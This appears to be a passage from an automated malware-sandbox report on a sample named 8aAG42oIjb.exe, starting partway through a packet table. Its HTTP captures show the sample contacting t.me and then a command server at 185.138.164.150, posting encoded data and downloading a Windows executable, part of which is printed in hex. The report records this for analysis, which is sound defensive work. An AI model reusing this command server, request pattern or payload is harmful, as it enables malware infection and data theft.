Sep 28, 2021 07:14:09.188627958 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188704967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188776016 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188829899 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188831091 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188879967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188925028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188937902 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188997984 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189038038 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189044952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189071894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189095974 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189115047 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189116955 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189140081 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189141035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189163923 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189186096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189186096 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189208984 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189229012 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189230919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189255953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189275980 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189280033 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189306021 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189332008 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189335108 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189361095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189373016 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189395905 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189428091 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189438105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189455032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189481974 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189503908 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189510107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189532995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189553022 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189557076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189579964 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189588070 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189603090 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189625025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189644098 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189646959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189672947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189682007 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.189697027 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189718008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.189742088 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.190375090 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.193718910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193753958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193777084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193782091 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.193799019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193821907 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193830967 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.193847895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193871975 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.193896055 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.193909883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.217303038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.217339039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.217365026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.217376947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.217468977 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.223540068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223583937 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223603964 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223615885 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223666906 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223685026 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.223792076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223814011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223829031 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.223851919 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.224016905 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:10.130856991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:10.130937099 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:10.166085958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:10.166110039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:10.413902998 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:10.597583055 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:11.550383091 CEST	49751	80	192.168.2.4	185.138.164.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 07:13:56.347626925 CEST	53723	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:13:56.366863012 CEST	53	53723	8.8.8.8	192.168.2.4
Sep 28, 2021 07:14:04.551639080 CEST	64646	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:14:04.570485115 CEST	53	64646	8.8.8.8	192.168.2.4
Sep 28, 2021 07:14:07.499285936 CEST	65298	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:14:07.548726082 CEST	53	65298	8.8.8.8	192.168.2.4
Sep 28, 2021 07:14:08.032640934 CEST	59123	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:14:08.054075956 CEST	53	59123	8.8.8.8	192.168.2.4
Sep 28, 2021 07:14:26.686137915 CEST	54531	53	192.168.2.4	8.8.8.8
Sep 28, 2021 07:14:26.703685999 CEST	53	54531	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 07:14:04.551639080 CEST	192.168.2.4	8.8.8.8	0x40f5	Standard query (0)	t.me	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 07:14:04.570485115 CEST	8.8.8.8	192.168.2.4	0x40f5	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

t.me

185.138.164.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49750	149.154.167.99	443	C:\Users\user\Desktop\8aAG42oIjb.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49751	185.138.164.150	80	C:\Users\user\Desktop\8aAG42oIjb.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 07:14:04.963080883 CEST	1033	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.138.164.150
Sep 28, 2021 07:14:04.963149071 CEST	1034	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 59 55 5a 66 75 39 79 46 46 71 72 2b 35 50 41 2b 36 4a 34 68 42 33 2f 65 44 41 53 68 77 35 Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3YUZfu9yFFqr+5PA+6J4hB3/eDAShw5I99tAthteM5WdFbCJar7tj6PxWZFldSIiUT+XAhR/Atg==
Sep 28, 2021 07:14:05.354696989 CEST	1035	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:14:05 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 66 33 37 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 64 4c 74 4e 69 49 73 2f 55 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 38 34 49 68 35 51 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 5a 42 36 2b 65 51 50 73 2b 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 5a 45 57 43 6c 49 67 2f 6f 74 6c 2b 31 74 36 45 75 47 73 66 62 43 49 4c 2f 4f 6b 77 36 50 70 58 61 67 6b 50 53 39 79 51 44 4c 43 59 69 51 33 4c 36 35 56 61 42 4b 50 32 45 62 6b 61 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 57 34 2b 46 62 38 68 72 4f 59 79 74 4f 35 4a 4e 30 42 74 59 4f 54 62 78 67 4a 74 32 6c 64 71 53 65 34 6c 64 39 68 4a 4e 73 4d 68 48 35 78 67 4d 6f 6f 43 33 54 6f 77 35 74 70 7a 31 7a 6c 35 48 39 6c 33 50 65 67 70 5a 49 71 4b 36 6d 69 61 30 79 55 56 37 44 6e 73 73 68 55 6b 64 31 57 47 66 45 37 6c 4e 6e 6c 6b 49 33 71 79 2f 35 72 49 35 4d 68 77 48 69 4a 7a 58 4d 6f 58 6a 31 6a 62 76 78 4c 64 61 6c 76 50 66 66 58 48 67 67 5a 44 50 72 34 6c 66 45 6f 45 61 6a 79 43 73 47 53 73 71 37 4a 4e 78 59 55 65 4c 79 59 43 37 69 45 57 6f 79 46 6b 37 6b 51 4a 71 33 73 63 54 55 6a 6b 65 34 68 59 47 35 70 6b 41 6e 75 72 76 58 54 56 75 6b 46 31 69 4a 63 41 78 52 34 39 51 6d 73 36 6e 51 65 67 75 56 30 53 69 54 6d 49 33 64 33 69 65 66 51 70 41 73 54 61 51 53 68 6d 2b 42 39 4f 46 38 6e 6a 43 4a 2b 41 77 43 56 6d 4e 6a 31 56 34 55 59 6e 44 73 52 2f 64 39 78 54 57 35 74 69 50 66 79 67 37 35 6f 44 7a 32 4f 71 7a 70 61 50 65 53 73 4d 30 6d 65 43 30 4e 48 65 77 41 4d 34 63 66 7a 4c 2b 66 57 54 39 6f 4d 4c 79 42 37 65 52 4b 69 53 64 69 31 78 73 50 4f 5a 4c 7a 32 63 4b 6c 78 64 6a 4b 79 6c 6d 4e 36 48 51 38 33 73 51 70 49 43 41 61 61 51 77 74 6a 4e 77 7a 61 46 62 38 68 5a 78 52 53 79 58 38 7a 55 6b 76 6f 2f 7a 68 51 32 47 30 6a 42 72 6e 70 2b 34 63 65 35 48 41 41 31 34 6b 44 78 64 6a 4a 71 2f 30 76 53 39 58 77 48 51 6a 6b 6e 30 63 4a 2f 34 36 45 73 54 2f 7a 46 79 6d 36 73 78 31 33 65 72 4c 51 4d 78 59 73 7a 76 57 62 76 57 65 49 49 57 74 78 76 61 53 52 47 48 36 56 61 70 35 4a 34 7a 33 79 56 55 67 6d 6e 6c 58 69 6a 38 73 39 4d 66 4c 67 78 39 41 38 46 79 7a 43 44 72 79 4d 7a 63 63 6d 43 4d 59 6c 30 70 48 4b 66 63 57 4d 30 50 6e 38 38 72 58 68 7a 36 4a 42 4c 2f 41 35 4a 4f 51 2f 74 38 56 33 35 65 78 70 78 6b 75 42 2b 4e 64 36 4f 62 62 45 68 35 7a 6b 49 57 68 5a 63 53 6a 34 4f 53 51 6d 38 2b 55 4f 4b 49 4a 59 45 75 75 2b 6d 4a 6f 78 71 47 4b 73 36 2f 79 78 36 71 2f 76 43 38 77 44 77 38 55 62 65 55 58 35 74 58 6a 4c 31 65 79 78 33 38 42 31 4e 30 6f 65 37 31 68 46 59 61 58 36 72 50 63 4a 44 34 39 75 79 47 72 63 6b 53 6b 57 2b 55 31 4c 67 56 4b 39 5a 2f 69 57 45 45 50 31 6c 68 5a 62 44 6e 38 76 4f 76 6c 79 4c 6d 4d 36 6e 31 78 63 58 70 75 4a 69 73 79 72 2b 78 6b 46 6f 5a 74 6e 77 4f 68 59 36 6f 2f 37 34 33 66 41 51 76 6a 4e 6b 6b 56 76 50 76 47 43 4d 7a 42 69 51 67 6b 47 45 6c 6d 62 6b 2b 42 71 59 49 73 33 6b 39 6e 6d 6c 59 74 63 74 34 39 2b 79 74 6c 33 6b 4c 39 6c 33 4f 6a 39 7a 44 49 63 35 73 38 65 4e 64 33 34 56 56 4d 67 2b 6e 5a 75 56 52 4d 74 73 69 45 63 6d 79 6c 36 71 78 76 65 61 47 34 51 2b 6e 61 43 78 56 6c 63 7a 52 6a 43 46 6d 50 68 46 39 57 71 4b 35 76 2f 4f 57 57 33 63 30 7a 74 35 31 4c 75 32 56 31 68 66 47 63 56 68 57 65 4e 68 2f 4f 47 61 4b 5a 58 4e 75 63 4d 38 75 65 6e 33 30 73 65 78 33 76 6a 4a 6a 66 66 41 79 7a 67 6a 77 34 73 61 6b 66 77 31 31 5a 62 76 51 31 72 68 68 44 4b 4d 2f 44 69 4f 72 47 75 76 78 68 67 30 2b 75 68 54 48 46 4a 4d 43 46 53 6e 50 72 46 Data Ascii: f37unN2GK+nPmdLtNiIs/UEy55RM+acetOz84Ih5Q3WAOVMT0Fbn38HbQZB6+eQPs+8wKVq28x0Zm3HZEWClIg/otl+1t6EuGsfbCIL/Okw6PpXagkPS9yQDLCYiQ3L65VaBKP2Ebka4b124vbL7XayDSfkgW4+Fb8hrOYytO5JN0BtYOTbxgJt2ldqSe4ld9hJNsMhH5xgMooC3Tow5tpz1zl5H9l3PegpZIqK6mia0yUV7DnsshUkd1WGfE7lNnlkI3qy/5rI5MhwHiJzXMoXj1jbvxLdalvPffXHggZDPr4lfEoEajyCsGSsq7JNxYUeLyYC7iEWoyFk7kQJq3scTUjke4hYG5pkAnurvXTVukF1iJcAxR49Qms6nQeguV0SiTmI3d3iefQpAsTaQShm+B9OF8njCJ+AwCVmNj1V4UYnDsR/d9xTW5tiPfyg75oDz2OqzpaPeSsM0meC0NHewAM4cfzL+fWT9oMLyB7eRKiSdi1xsPOZLz2cKlxdjKylmN6HQ83sQpICAaaQwtjNwzaFb8hZxRSyX8zUkvo/zhQ2G0jBrnp+4ce5HAA14kDxdjJq/0vS9XwHQjkn0cJ/46EsT/zFym6sx13erLQMxYszvWbvWeIIWtxvaSRGH6Vap5J4z3yVUgmnlXij8s9MfLgx9A8FyzCDryMzccmCMYl0pHKfcWM0Pn88rXhz6JBL/A5JOQ/t8V35expxkuB+Nd6ObbEh5zkIWhZcSj4OSQm8+UOKIJYEuu+mJoxqGKs6/yx6q/vC8wDw8UbeUX5tXjL1eyx38B1N0oe71hFYaX6rPcJD49uyGrckSkW+U1LgVK9Z/iWEEP1lhZbDn8vOvlyLmM6n1xcXpuJisyr+xkFoZtnwOhY6o/743fAQvjNkkVvPvGCMzBiQgkGElmbk+BqYIs3k9nmlYtct49+ytl3kL9l3Oj9zDIc5s8eNd34VVMg+nZuVRMtsiEcmyl6qxveaG4Q+naCxVlczRjCFmPhF9WqK5v/OWW3c0zt51Lu2V1hfGcVhWeNh/OGaKZXNucM8uen30sex3vjJjffAyzgjw4sakfw11ZbvQ1rhhDKM/DiOrGuvxhg0+uhTHFJMCFSnPrF
Sep 28, 2021 07:14:05.354748011 CEST	1036	IN	Data Raw: 4b 37 75 70 4c 54 31 6f 39 56 38 49 38 4b 30 58 53 69 4a 57 70 4e 48 34 77 2f 30 55 33 6c 62 53 35 71 4e 70 36 65 4b 72 64 68 52 6d 76 49 68 4b 75 55 66 70 62 44 56 4e 4d 64 5a 45 49 6e 73 4c 31 61 56 38 6a 58 38 57 38 4c 2f 4d 44 55 34 79 48 46 Data Ascii: K7upLT1o9V8I8K0XSiJWpNH4w/0U3lbS5qNp6eKrdhRmvIhKuUfpbDVNMdZEInsL1aV8jX8W8L/MDU4yHFKjvCVwMHqCohydJEXhIymg8m+EMxn/nmkpqJYDQO4nYXkJ/9zEtlXHEu96xCM+ALK32pu2j5QCnbX4oiVAdPPu4xEYb1WVqVF4xJ+5YreiS7X/OPZvC7tv+53fZFvYEpPdlOdqN+LxSipV/6GSjkiYjeZP7mmd8F3
Sep 28, 2021 07:14:05.354810953 CEST	1038	IN	Data Raw: 70 44 64 30 36 4f 72 45 73 49 70 61 54 4f 56 58 6b 33 53 41 57 47 78 76 54 79 4c 6d 66 70 79 75 77 2b 65 35 59 48 57 77 2f 78 6a 77 69 6e 36 62 37 53 74 4a 58 49 53 73 2f 32 71 43 42 43 4d 7a 4d 32 7a 56 6c 2f 78 31 46 58 37 58 55 78 59 30 69 4e Data Ascii: pDd06OrEsIpaTOVXk3SAWGxvTyLmfpyuw+e5YHWw/xjwin6b7StJXISs/2qCBCMzM2zVl/x1FX7XUxY0iNTOjG/cdHbwqse2w1r4yMkZgfffY/88fy6wiHROGJsyxunuNTvCim5JBpi88ILiD9W8BbwItftVRP7Scoz0qP82w5RQgyzTaUST8Oq+kn+hWJRJylWtOcsm9HEGGwT/B2VyH0HSDNuyXWQ6m3xr6mxxlNV9sw5b5ma
Sep 28, 2021 07:14:05.354844093 CEST	1038	IN	Data Raw: 6a 42 6c 2f 4a 55 65 50 4e 42 6f 61 76 2b 38 62 71 57 4e 70 4d 2f 39 39 70 41 2f 36 49 4f 41 64 2b 53 43 61 37 53 54 61 61 2b 76 5a 4d 62 41 56 6f 6e 47 64 54 77 49 43 4d 79 34 6c 42 4b 42 64 38 6b 63 38 52 47 6e 6c 4f 55 37 74 71 4c 38 62 46 45 Data Ascii: jBl/JUePNBoav+8bqWNpM/99pA/6IOAd+SCa7STaa+vZMbAVonGdTwICMy4lBKBd8kc8RGnlOU7tqL8bFEDcNr488Lxi4mTiBcTGgp35
Sep 28, 2021 07:14:05.397536993 CEST	1039	IN	Data Raw: 37 64 64 0d 0a 2f 54 59 4b 6f 53 35 30 6a 43 43 7a 32 4e 35 66 30 77 35 33 2f 32 6c 6d 46 4a 5a 6d 4f 6d 37 57 73 66 45 75 54 6f 62 58 71 65 66 63 37 59 71 70 52 34 78 72 71 38 33 47 43 62 43 73 54 35 72 42 75 32 64 54 74 41 33 50 71 6a 50 31 42 Data Ascii: 7dd/TYKoS50jCCz2N5f0w53/2lmFJZmOm7WsfEuTobXqefc7YqpR4xrq83GCbCsT5rBu2dTtA3PqjP1BrwRVYj78JAkaVyI1fu3f4+TFpx+VsizApmSgTYbvf3NcGZko0qqFF8srAMNiUdkTF2knygraCDJVnal/+yr/+gEgC8VoxjBf0gVt1i/V0kpiSbwPNwynspuZkosIkm8uLM0wQ0TvGhOi32/0P4DP9BWY4CKnxDkv/
Sep 28, 2021 07:14:05.397564888 CEST	1040	IN	Data Raw: 36 59 61 48 38 58 58 6a 7a 44 56 61 55 74 31 33 51 6a 6b 6d 59 56 77 48 39 75 39 75 4f 66 48 4a 48 37 52 52 67 4d 44 32 46 36 2b 58 5a 36 4d 6d 30 42 58 4d 51 53 79 56 67 62 6b 38 51 4a 33 72 79 58 30 78 64 45 77 4b 36 70 67 63 51 49 64 42 6f 75 Data Ascii: 6YaH8XXjzDVaUt13QjkmYVwH9u9uOfHJH7RRgMD2F6+XZ6Mm0BXMQSyVgbk8QJ3ryX0xdEwK6pgcQIdBouRXW+4cvJxpQHqBzSEcJWfclnmwQYcLFa5be5H8qLbtVBlAnoEE38kF7D0oOJujzzQXooPvXD5joZ+zK2FJzMD5f8PaR0DCqzuEa4pN/Ulck5jfY9rc/xBK/m+nieyvgrALb3WSbV/VuxXNrotzjIZ1zccDmX8UXSf
Sep 28, 2021 07:14:05.397572994 CEST	1040	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Sep 28, 2021 07:14:05.414235115 CEST	1040	OUT	GET //l/f/p5H3KXwB3dP17SpzXqG4/0082491d8ce92dde3db733700e3efad352687de3 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 28, 2021 07:14:05.683645010 CEST	1042	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:14:05 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Sep 28, 2021 07:14:05.683682919 CEST	1043	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Sep 28, 2021 07:14:05.683696032 CEST	1045	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Sep 28, 2021 07:14:05.683705091 CEST	1045	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 Data Ascii: $1U1E]E]EEEtM`ay?U
